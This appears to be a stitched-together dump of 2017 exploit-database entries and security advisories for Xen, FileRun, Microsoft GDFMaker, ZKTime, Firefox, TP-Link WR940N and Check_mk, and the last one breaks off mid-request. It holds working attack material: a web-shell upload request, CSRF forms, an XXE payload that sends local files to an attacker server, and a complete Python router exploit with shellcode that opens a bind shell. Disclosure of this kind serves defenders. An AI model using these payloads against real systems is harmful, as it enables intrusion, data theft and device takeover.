(XEN) [<ffff82d08017a28a>] mm.c#put_page_from_l2e+0x7a/0x190
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d0801793ae>] mm.c#get_page_from_pagenr+0x4e/0x60
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d0801791e3>] get_page+0x13/0xf0
(XEN) [<ffff82d080183056>] do_mmuext_op+0x1056/0x1500
(XEN) [<ffff82d080182000>] do_mmuext_op+0/0x1500
(XEN) [<ffff82d080169c96>] pv_hypercall+0xf6/0x1c0
(XEN) [<ffff82d08019bea3>] do_page_fault+0x163/0x4c0
(XEN) [<ffff82d080237abe>] entry.o#test_all_events+0/0x2a
(XEN)
(XEN)
(XEN) ****************************************
(XEN) Panic on CPU 0:
(XEN) DOUBLE FAULT -- system shutdown
(XEN) ****************************************
(XEN)
(XEN) Reboot in five seconds...
==============================
This PoC just causes a DoS, but as far as I can tell, Xen only uses
guard pages for the stack (via memguard_guard_stack()) in debug builds,
which would mean that this is a potentially exploitable issue in release builds.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43014.zip
SEC Consult Vulnerability Lab Security Advisory < 20171018-0 >
=======================================================================
title: Multiple vulnerabilities
product: Afian AB FileRun
vulnerable version: 2017.03.18
fixed version: 2017.09.18
impact: critical
homepage: https://www.filerun.com | https://afian.se
found: 2017-08-28
by: Roman Ferdigg (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"FileRun File Manager: access your files anywhere through self-hosted
secure cloud storage, file backup and sharing for your photos, videos,
files and more. Upload and download large files for easy sharing. Google
Drive self-hosted alternative."
Source: https://www.filerun.com
Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker
can compromise the web server which has FileRun installed. User files might
get exposed through this attack.
SEC Consult recommends not to use FileRun until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.
Vulnerability overview/description:
-----------------------------------
1) Path Manipulation
When uploading, downloading or viewing files, FileRun uses a parameter to
specify the path on the file-system. An attacker can manipulate the value
of this parameter to read, create and even overwrite files in certain
folders. An attacker could upload malicious files to compromise the
webserver. In combination with the open redirect and CSRF vulnerability
even an unauthenticated attacker can upload these files to get a shell.
Through the shell all user files can be accessed.
2) Stored Cross Site Scripting (XSS) via File Upload
The application allows users to upload different file types. It is also
possible to upload HTML files or to create them via the application's text
editor. Files can be shared using a link or within the FileRun application
(in the enterprise version). An attacker can inject JavaScript in HTML
files to attack other users or simply create a phishing site to steal user
credentials.
Remark:
In the standard configuration of the FileRun docker image the HttpOnly
cookie flag is not set, which means that authentication cookies can be
accessed in an XSS attack. This allows easy session hijacking as well.
3) Cross Site Request Forgery (CSRF)
The application does not implement CSRF protection. An attacker can exploit
this vulnerability to execute arbitrary requests with the privileges of the
victim. The only requirement is that a victim visits a malicious webpage.
Such a page could be hosted on the FileRun server itself and shared with
other users as described in vulnerability 2.
Besides others, the following actions can be performed via CSRF if the
victim has administrative privileges:
- Create or delete users
- Change permissions rights of users
- Change user passwords
If the victim has no administrative privileges, for example the following
actions can be performed:
- Upload files
- Change the email address (for password recovery)
4) Open Redirect Vulnerabilities
An open redirect vulnerability in the login and logout pages allows an
attacker to redirect users to arbitrary web sites. The redirection host
could be used for phishing attacks (e.g. to steal user credentials) or for
running browser exploits to infect a victim's machine with malware. The open
redirect in the login page could also be used to exploit CSRF (see above).
Because the server name in the manipulated link is identical to the
original site, phishing attempts may have a more trustworthy appearance.
Proof of concept:
-----------------
1) Path Manipulation
The URL below is used to read the application file "autoconfig.php", which
contains the username and cleartext password of the database.
URL:
http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/autoconfig.php
This post request is used to upload a PHP shell in the writable folder
avatars:
POST /?module=fileman_myfiles§ion=ajax&page=up HTTP/1.1
Host: $DOMAIN
[...]
Content-Type: multipart/form-data; boundary=---------------------------293712729522107
Cookie: FileRunSID=t5h7lm99r1ff0quhsajcudh7t0; language=english
DNT: 1
Connection: close
-----------------------------293712729522107
Content-Disposition: form-data; name="flowTotalSize"
150
-----------------------------293712729522107
Content-Disposition: form-data; name="flowIsFirstChunk"
1
-----------------------------293712729522107
Content-Disposition: form-data; name="flowIsLastChunk"
1
-----------------------------293712729522107
Content-Disposition: form-data; name="flowFilename"
shell.php
-----------------------------293712729522107
Content-Disposition: form-data; name="path"
/var/www/html/system/data/avatars/
-----------------------------293712729522107
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
*web shell payload here*
-----------------------------293712729522107--
To execute the uploaded shell a .htaccess file with the contents below can
be uploaded in the same folder.
Content of .htaccess file:
<Files "*">
Order allow,deny
Allow from all
</Files>
The uploaded shell can be accessed by the following URL:
http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/avatars/shell.php
2) Stored Cross Site Scripting (XSS) via File Upload
An HTML file with JavaScript code can be easily uploaded to attack other users.
No PoC necessary.
3) Cross Site Request Forgery
An example for a CSRF attack would be the following request which changes
the email address of the victim:
<html>
<body>
<form action="http://$DOMAIN/?module=fileman§ion=profile&action=save"
method="POST">
<input type="hidden" name="receive_notifications" value="0" />
<input type="hidden" name="two_step_enabled" value="0" />
<input type="hidden" name="name" value="User" />
<input type="hidden" name="name2" value="A" />
<input type="hidden" name="email" value="newemail@example.com" />
<input type="hidden" name="ext-comp-1009" value="on" />
<input type="hidden" name="current_password" value="" />
<input type="hidden" name="new_password" value="" />
<input type="hidden" name="confirm_new_password" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The new email address can be used by the attacker to reset the password of
the victim.
4) Open Redirect Vulnerabilites
The URL below can be used to forward a user to an arbitrary website after
the login:
http://$DOMAIN/?redirectAfterLogin=aHR0cDovL3d3dy5ldmlsLmNvbQ==
The value of the redirect parameter needs to be base64 encoded.
To redirect a user after logout, following URL can be used:
http://$DOMAIN/?module=fileman&page=logout&redirect=http://evil.com
In this case for a successful exploit, the victim has to be logged in.
Vulnerable / tested versions:
-----------------------------
The regular version of FileRun 2017.03.18 has been tested. It is assumed
earlier versions of FileRun are also vulnerable to the issues.
Vendor contact timeline:
------------------------
2017-08-31: Contacting vendor through info@afian.se, info@filerun.com
2017-09-01: Sending unencrypted advisory as requested by vendor
2017-09-04: FileRun fixed the vulnerability "Path Manipulation"
2017-09-12: Requesting a status update
2017-09-13: FileRun informed us that a patch for all vulnerabilities will
be released before 2017-09-20
2017-09-16: Patch available
2017-10-18: Public release of security advisory
Solution:
---------
Update to the latest version available (see https://docs.filerun.com/updating).
According to FileRun, all the vulnerabilities are fixed in release
2017.09.18 or higher.
For further information see:
https://www.filerun.com/changelog
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Roman Ferdigg / @2017
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-GAME-DEFINITION-FILE-MAKER-v6.3.9600-XML-EXTERNAL-ENTITY.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
===========
GDFMaker v6.3.9600.16384
Game Definition File Editor (gdfmaker.exe)
The Game Definition File Editor is a graphical utility designed for creating localized game definition files (GDFs)
as well as the necessary resource compiler scripts to compile game-definition files. The GDF editor uses a project-based
format to organize data.
Vulnerability Type:
===================
XML External Entity
CVE Reference:
==============
N/A
Security Issue:
================
If a user loads an attacker supplied "GDFMakerProject" file type into GDF Maker using Ctrl+O or file menu, local files can be exfiltrated
to remote attacker controlled server, as gdfmaker.exe is vulnerable to XML External Entity Expansion attacks.
gdfmaker.exe can be found on Windows systems as part of Windows Kits: "C:\Program Files (x86)\Windows Kits\8.1\bin\x86\"
Note: The malicious file has to be opened using Ctrl + O or File / Open, double clicking does not seem to trigger it.
Victim may see an error like ... "There is an error in XML document(2,11)" and we get the victims file sent to our remote server.
Exploit/POC:
=============
Steal "msdfmap.ini" used by Remote MS ADO services POC.
1) "PWN.GDFMakerProject"
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "C:\Windows\msdfmap.ini">
<!ENTITY % sp SYSTEM "http://127.0.0.1:8000/exfil.dtd">
%sp;
%param3;
%exfil;
]>
2) "exfil.dtd"
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'http://localhost:8000/%data3;'>">
3) Start our file listener on Port 8000
C:\>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
4) Open the infected file using Ctrl+O or File Menu Open methods.
BOOOOM!
127.0.0.1 - - [18/Oct/2017 14:17:54] "GET /exfil.dtd HTTP/1.1" 200 -
127.0.0.1 - - [18/Oct/2017 14:17:54] code 404, message File not found
127.0.0.1 - - [18/Oct/2017 14:17:54] "GET /;%5Bconnect%20name%5D%20will%20modify%20the%20connection%20if%20ADC.connect=%22name%22%0D%0A;%5Bconnect%20default%5D%20will%20modify%20the%20connection%20if%20name%20is%20not%20found%0D%0A;%5Bsql%20name%5D%20will%20modify%20the%20Sql%20if%20ADC.sql=%22name(args)%22%0D%0A;%5Bsql%20default%5D%20will%20modify%20the%20Sql%20if%20name%20is%20not%20found%0D%0A;Override%20strings:%20Connect,%20UserId,%20Password,%20Sql.%0D%0A;Only%20the%20Sql%20strings%20support%20parameters%20using%20%22?%22%0D%0A;The%20override%20strings%20must%20not%20equal%20%22%22%20or%
20they%20are%20ignored%0D%0A;A%20Sql%20entry%20must%20exist%20in%20each%20sql%20section%20or%20the%20section%20is%20ignored%0D%0A;An%20Access%20entry%20must%20exist%20in%20each%20connect%20section%20or%20the%20section%20is%20ignored%0D%0A;Access=NoAccess%0D%0A;Access=ReadOnly%0D%0A;Access=ReadWrite%0D%0A;%5Buserlist%20name%5D%20allows%20specific%20users%20to%20have%20special%20access%0D%0A;The%20Access%20is%20computed%20as%20follows:%0D%0A;%20%20(1)%20First%20take%20the%20access%20of%20the%20connect%20section.%0D%0A;%20%20(2)%20If%20a%20user%20entry%20is%20found,%20it%20will%20override.%0D%0A%
0D%0A%5Bconnect%20default%5D%0D%0A;If%20we%20want%20to%20disable%20unknown%20connect%20values,%20we%20set%20Access%20to%20NoAccess%0D%0AAccess=NoAccess%0D%0A%0D%0A%5Bsql%20default%5D%0D%0A;If%20we%20want%20to%20disable%20unknown%20sql%20values,%20we%20set%20Sql%20to%20an%20invalid%20query.%0D%0ASql=%22%20%22%0D%0A%0D%0A%5Bconnect%20CustomerDatabase%5D%0D%0AAccess=ReadWrite%0D%0AConnect=%22DSN=AdvWorks%22%0D%0A%0D%0A%5Bsql%20CustomerById%5D%0D%0ASql=%22SELECT%20*%20FROM%20Customers%20WHERE%20CustomerID%20=%20?%22%0D%0A%0D%0A%5Bconnect%20AuthorDatabase%5D%0D%0AAccess=ReadOnly%0D%0AConnect=%22DSN
=MyLibraryInfo;UID=MyUserID;PWD=MyPassword%22%0D%0A%0D%0A%5Buserlist%20AuthorDatabase%5D%0D%0AAdministrator=ReadWrite%0D%0A%0D%0A%5Bsql%20AuthorById%5D%0D%0ASql=%22SELECT%20*%20FROM%20Authors%20WHERE%20au_id%20=%20?%22 HTTP/1.1" 404 -
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: October 8, 2016
Vendor reply : October 8, 2016 "Upon investigation we have determined that this does not meet the bar for security servicing as it would require an individual to download a malicious file from an untrusted source"
vendor reply : November 5, 2016 "opened case 35611"
vendor reply : November 8, 2016 "We have successfully reproduced the issue that you reported to us"
Vendor reply : December 5, 2016 "will be fixing this issue in next version of SDK which will be released along with major Windows update"
October 18, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
Exploit Title: ZKTime Web Software 2.0 - Cross Site Request Forgery
CVE-ID: CVE-2017-13129
Vendor Homepage: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
Vendor of Product: ZKTeco
Affected Product Code: ZKTime Web - 2.0.1.12280
Category: WebApps
Author: Arvind V.
Author Social: @Find_Arvind
------------------------------------------
Product description:
ZKTime Web 2.0 is a cutting edge Web-based Time Attendance software, which
provided a stable communication for devices through GPRS/WAN, hence, users
can access the software anywhere by their Web Browser to remotely manage
hundreds of T&A terminals under complex network condition (WLAN). The
Application has an administrator role and application user role.
Attack Description:
The ZKTime Web Software allows the Administrator to elevate the privileges
of the application user by simple click of a radio button namely
"superuser". However when the request is generated there are no random
tokens attached to this request to prevent any kind of Cross Site Request
Forgery attacks. Moreover there no other protections (like administrator
password verification etc.) mechanisms in place to block any kind of forged
requests.
An Attacker takes advantage of this scenario and creates a crafted link to
add himself as an administrator to the ZKTime Web Software. He then uses
social engineering methods to trick the administrator into click the forged
http request. The request is executed and the attacker becomes the
Administrator of the
ZKTime Web Software.
Proof of Concept Code:
Forged HTTP Request used by the attacker:
<html>
<body>
<form action="http://XX.XX.XX.46:8081/data/auth/User/14/
<http://xx.xx.xx.46:8081/data/auth/User/14/>" method="POST">
<input type="hidden" name="pk" value="" />
<input type="hidden" name="username" value="Pentestuser1" />
<input type="hidden" name="Password" value="" />
<input type="hidden" name="ResetPassword" value="" />
<input type="hidden" name="fpidnum" value="" />
<input type="hidden" name="fpcount" value="0" />
<input type="hidden" name="tlng" value="en" />
<input type="hidden" name="first_name" value="Pentest" />
<input type="hidden" name="last_name" value="User" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="is_staff" value="on" />
<input type="hidden" name="is_superuser" value="on" />
<input type="hidden" name="last_login" value="2017-08-20 14:14:34" />
<input type="hidden" name="initial-last_login" value="2017-08-20
14:14:34" />
<input type="hidden" name="date_joined" value="2017-08-20 14:14:34" />
<input type="hidden" name="initial-date_joined" value="2017-08-20
14:14:34" />
<input type="hidden" name="finnger" value="" />
<input type="hidden" name="template" value="" />
<input type="hidden" name="finger10" value="" />
<input type="hidden" name="template10" value="" />
<input type="hidden" name="delfp" value="" />
<input type="hidden" name="actflag" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Impact:
If the vulnerability is successfully exploited than an attacker (who would
be a normal user of the web application) can escalate his privileges and
become the administrator of ZK Time Web Software.
References:
http://seclists.org/fulldisclosure/2017/Sep/38
http://seclists.org/bugtraq/2017/Sep/19
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13129
Vulnerability Timeline:
18th August 2017 – Vulnerability Discovered
20th August 2017 – Contacted Vendor – No Response
1st September 2017 – Contacted Vendor again – No Response
18th September 2017 – Vulnerability Disclosed
Exploit Title: ZKTime Web Software 2.0 - Broken Authentication
CVE-ID: CVE-2017-14680
Vendor Homepage: https://www.zkteco.com/product/ZKTime_Web_2.0_435.html
Vendor of Product: ZKTeco
Affected Product Code: ZKTime Web - 2.0.1.12280
Category: WebApps
Author: Arvind V.
Author Social: @Find_Arvind
------------------------------------------
Product description:
ZKTime Web 2.0 is a cutting edge Web-based Time Attendance software, which
provided a stable communication for devices through GPRS/WAN, hence, users
can access the software anywhere by their Web Browser to remotely manage
hundreds of T&A terminals under complex network condition (WLAN). The
Application has an administrator role and application user role.
Attack Description:
The Application is a time attendance software which allows users to
download their time and attendance data from the application in a PDF
Format. The data includes their employee’s id, user-id, gender,
birth-dates, phone numbers and access-areas. These PDF Files however are
not properly authenticated. If any user get access to the file-download
link, he can go ahead and download these files directly without any
authentication.
Proof of Concept Links:
1) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144237.pdf
<http://xx.xx.xx.xx:8081/tmp/report_file/Personnel_20170820144237.pdf>
2) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144238.pdf
<http://xx.xx.xx.xx:8081/tmp/report_file/Personnel_20170820144238.pdf>
3) http://XX.XX.XX.XX:8081/tmp/report_file/Personnel_20170820144239.pdf
<http://xx.xx.xx.xx:8081/tmp/report_file/Personnel_20170820144239.pdf>
Impact:
Personal details pertaining to the employees of the company are disclosed
without their permissions. This leads to violation of user privacy.
Moreover the information available can be used to mount further attacks.
References:
http://seclists.org/fulldisclosure/2017/Sep/39
http://seclists.org/bugtraq/2017/Sep/20
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14680
Vulnerability Timeline:
18th August 2017 – Vulnerability Discovered
20th August 2017 – Contacted Vendor – No Response
1st September 2017 – Contacted Vendor again – No Response
18th September 2017 – Vulnerability Disclosed
# Exploit Title: Mozilla Firefox < 55 - Forcibly make someone view a web content
# Category: Denial of Service
# Date: 5/11/17
# CVE : CVE-2017-7783
# Affected Version: < Mozilla Firefox 55
# Tested on: Windows/Linux
# Software Link: https://www.mozilla.org/en-US/firefox/52.0/releasenotes/
# Exploit Author: Amit Sangra
# Website: http://CyberCriminals.net
# Description:
If a long user name is used in a username/password combination in a site URL (such as http://UserName:Password@example.com), the resulting modal prompt will hang in a non-responsive state or crash, causing a denial of service.
# Impact:
An attacker can create a webpage having some content and exploit.
Now once a victim visits this webpage, his browser gets locked out and he is forcibly made to view attacker supplied content.
# Exploit:
<?php
$exploit=str_repeat(chr(0x41),10000);
$location="http://Username".$exploit.":Password@Firefox.com";
echo "<center><h1>Firefox Lockout Vulnerability</h1>";
//Content to be forcibly viewed
echo "<iframe width=854 height=480 src=https://www.youtube.com/embed/QH2-TGUlwu4?autoplay=1 frameborder=0 allowfullscreen></iframe></center>";
//End
echo "<script>setTimeout(\"location.href ='".$location."';\",10000);</script>";
?>
# Solution:
Update to version 55
https://www.mozilla.org/en-US/firefox/55.0/releasenotes/
# Mozilla Foundation Security Advisory:
https://www.mozilla.org/en-US/security/advisories/mfsa2017-18/#CVE-2017-7783
import urllib2
import base64
import hashlib
from optparse import *
import sys
import urllibbanner = (
"___________________________________________________________________________\n"
"WR940N Authenticated Remote Code Exploit\n"
"This exploit will open a bind shell on the remote target\n"
"The port is 31337, you can change that in the code if you wish\n"
"This exploit requires authentication, if you know the creds, then\n"
"use the -u -p options, otherwise default is admin:admin\n"
"___________________________________________________________________________"
)
def login(ip, user, pwd):
print "[+] Attempting to login to http://%s %s:%s"%(ip,user,pwd)
#### Generate the auth cookie of the form b64enc('admin:' + md5('admin'))
hash = hashlib.md5()
hash.update(pwd)
auth_string = "%s:%s" %(user, hash.hexdigest())
encoded_string = base64.b64encode(auth_string)
print "[+] Encoded authorisation: %s" %encoded_string
#### Send the request
url = "http://" + ip + "/userRpm/LoginRpm.htm?Save=Save"
print "[+] sending login to " + url
req = urllib2.Request(url)
req.add_header('Cookie', 'Authorization=Basic %s' %encoded_string)
resp = urllib2.urlopen(req)
#### The server generates a random path for further requests, grab that here
data = resp.read()
next_url = "http://%s/%s/userRpm/" %(ip, data.split("/")[3])
print "[+] Got random path for next stage, url is now %s" %next_url
return (next_url, encoded_string)
#custom bind shell shellcode with very simple xor encoder
#followed by a sleep syscall to flush cash before running
#bad chars = 0x20, 0x00
shellcode = (
#encoder
"\x22\x51\x44\x44\x3c\x11\x99\x99\x36\x31\x99\x99"
"\x27\xb2\x05\x4b" #0x27b2059f for first_exploit
"\x22\x52\xfc\xa0\x8e\x4a\xfe\xf9"
"\x02\x2a\x18\x26\xae\x43\xfe\xf9\x8e\x4a\xff\x41"
"\x02\x2a\x18\x26\xae\x43\xff\x41\x8e\x4a\xff\x5d"
"\x02\x2a\x18\x26\xae\x43\xff\x5d\x8e\x4a\xff\x71"
"\x02\x2a\x18\x26\xae\x43\xff\x71\x8e\x4a\xff\x8d"
"\x02\x2a\x18\x26\xae\x43\xff\x8d\x8e\x4a\xff\x99"
"\x02\x2a\x18\x26\xae\x43\xff\x99\x8e\x4a\xff\xa5"
"\x02\x2a\x18\x26\xae\x43\xff\xa5\x8e\x4a\xff\xad"
"\x02\x2a\x18\x26\xae\x43\xff\xad\x8e\x4a\xff\xb9"
"\x02\x2a\x18\x26\xae\x43\xff\xb9\x8e\x4a\xff\xc1"
"\x02\x2a\x18\x26\xae\x43\xff\xc1"
#sleep
"\x24\x12\xff\xff\x24\x02\x10\x46\x24\x0f\x03\x08"
"\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa"
"\x27\xa4\xfb\xfa\x01\x01\x01\x0c\x21\x8c\x11\x5c"
################ encoded shellcode ###############
"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x98\x59\xb9\xbe\x01\xc0\x28\x27\x28\x06"
"\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x23\x39\x44\x44\x30\x50\xff\xff"
"\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d"
"\x7a\x69" #<————————- PORT 0x7a69 (31337)
"\x24\x0f\xfd\xff\x01\xe0\x78\x27\x01\xcf\x78\x04\x01\xaf\x68\x25\xaf\xad"
"\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x9b\x89\xb9\xbc"
"\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49\x01\x01"
"\x01\x0c\x24\x0f\x73\x50"
"\x9b\x89\xb9\xbc\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x24\x0f"
"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48"
"\x01\x01\x01\x0c\x24\x0f\x73\x50\x30\x50\xff\xff\x9b\x89\xb9\xbc\x24\x0f"
"\xff\xfd\x01\xe0\x28\x27\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50"
"\x9b\x89\xb9\xbc\x28\x05\x01\x01\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f"
"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\xbd\x9b\x96\x46\x01\x01\x01\x0c"
"\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce"
"\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8"
"\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c\x24\x02"
"\x10\x46\x24\x0f\x03\x68\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa"
"\x27\xa4\xfb\xfe\x01\x01\x01\x0c\x21\x8c\x11\x5c"
)
###### useful gadgets #######
nop = "\x22\x51\x44\x44"
gadg_1 = "\x2A\xB3\x7C\x60"
gadg_2 = "\x2A\xB1\x78\x40"
sleep_addr = "\x2a\xb3\x50\x90"
stack_gadg = "\x2A\xAF\x84\xC0"
call_code = "\x2A\xB2\xDC\xF0"
def first_exploit(url, auth):
# trash $s1 $ra
rop = "A"*164 + gadg_2 + gadg_1 + "B"*0x20 + sleep_addr + "C"*4
rop += "C"*0x1c + call_code + "D"*4 + stack_gadg + nop*0x20 + shellcode
params = {'ping_addr': rop, 'doType': 'ping', 'isNew': 'new', 'sendNum': '20', 'pSize': '64', 'overTime': '800', 'trHops': '20'}
new_url = url + "PingIframeRpm.htm?" + urllib.urlencode(params)
print "[+] sending exploit..."
print "[+] Wait a couple of seconds before connecting"
print "[+] When you are finished do http -r to reset the http service"
req = urllib2.Request(new_url)
req.add_header('Cookie', 'Authorization=Basic %s' %auth)
req.add_header('Referer', url + "DiagnosticRpm.htm")
resp = urllib2.urlopen(req)
def second_exploit(url, auth):
url = url + "WanStaticIpV6CfgRpm.htm?"
# trash s0 s1 s2 s3 s4 ret shellcode
payload = "A"*111 + "B"*4 + gadg_2 + "D"*4 + "E"*4 + "F"*4 + gadg_1 + "a"*0x1c
payload += "A"*4 + sleep_addr + "C"*0x20 + call_code + "E"*4
payload += stack_gadg + "A"*4 + nop*10 + shellcode + "B"*7
print len(payload)
params = {'ipv6Enable': 'on', 'wantype': '2', 'ipType': '2', 'mtu': '1480', 'dnsType': '1',
'dnsserver2': payload, 'ipAssignType': '0', 'ipStart': '1000',
'ipEnd': '2000', 'time': '86400', 'ipPrefixType': '0', 'staticPrefix': 'AAAA',
'staticPrefixLength': '64', 'Save': 'Save', 'RenewIp': '1'}
new_url = url + urllib.urlencode(params)
print "[+] sending exploit…"
print "[+] Wait a couple of seconds before connecting"
print "[+] When you are finished do http -r to reset the http service"
req = urllib2.Request(new_url)
req.add_header('Cookie', 'Authorization=Basic %s' %auth)
req.add_header('Referer', url + "WanStaticIpV6CfgRpm.htm")
resp = urllib2.urlopen(req)
if __name__ == '__main__':
print banner
username = "admin"
password = "admin"
parser = OptionParser()
parser.add_option("-t", "–target", dest="host",
help="target ip address")
parser.add_option("-u", "–user", dest="username",
help="username for authentication",
default="admin")
parser.add_option("-p", "–password", dest="password",
help="password for authentication",
default="admin")
(options, args) = parser.parse_args()
if options.host is None:
parser.error("[x] A host name is required at the minimum [x]")
if options.username is not None:
username = options.username
if options.password is not None:
password = options.password
(next_url, encoded_string) = login(options.host, username, password)
###### Both exploits result in the same bind shell ######
#first_exploit(data[0], data[1])
second_exploit(next_url, encoded_string).
1. ADVISORY INFORMATION
=======================
Product: Check_mk
Vendor URL: https://mathias-kettner.de/check_mk.html
Type: Race Condition [CWE-362]
Date found: 2017-09-21
Date published: 2017-10-18
CVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE: CVE-2017-14955
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
Check_mk v1.2.8p25
Check_mk v1.2.8p25 Enterprise
older versions may be affected too.
4. INTRODUCTION
===============
Check_MK is comprehensive IT monitoring solution in the tradition of Nagios.
Check_MK is available as Raw Edition, which is 100% pure open source, and as
Enterprise Edition with a lot of additional features and professional support.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
Check_mk is vulnerable to an unauthenticated information disclosure through a
race condition during the authentication process when trying to authenticate
with a valid username and an invalid password.
On a failed login, the application calls the function save_users(), which
performs two os.rename operations on the files "contacts.mk.new" and
"users.mk.new" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):
[..]
# Check_MK's monitoring contacts
filename = root_dir + "contacts.mk.new"
out = create_user_file(filename, "w")
out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
out.close()
os.rename(filename, filename[:-4])
# Users with passwords for Multisite
filename = multisite_dir + "users.mk.new"
make_nagios_directory(multisite_dir)
out = create_user_file(filename, "w")
out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
out.close()
os.rename(filename, filename[:-4])
[...]
When sending many concurrent authentication requests with an existing/valid
username, such as:
POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1
---9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"
login
---9519178121294961341040589727
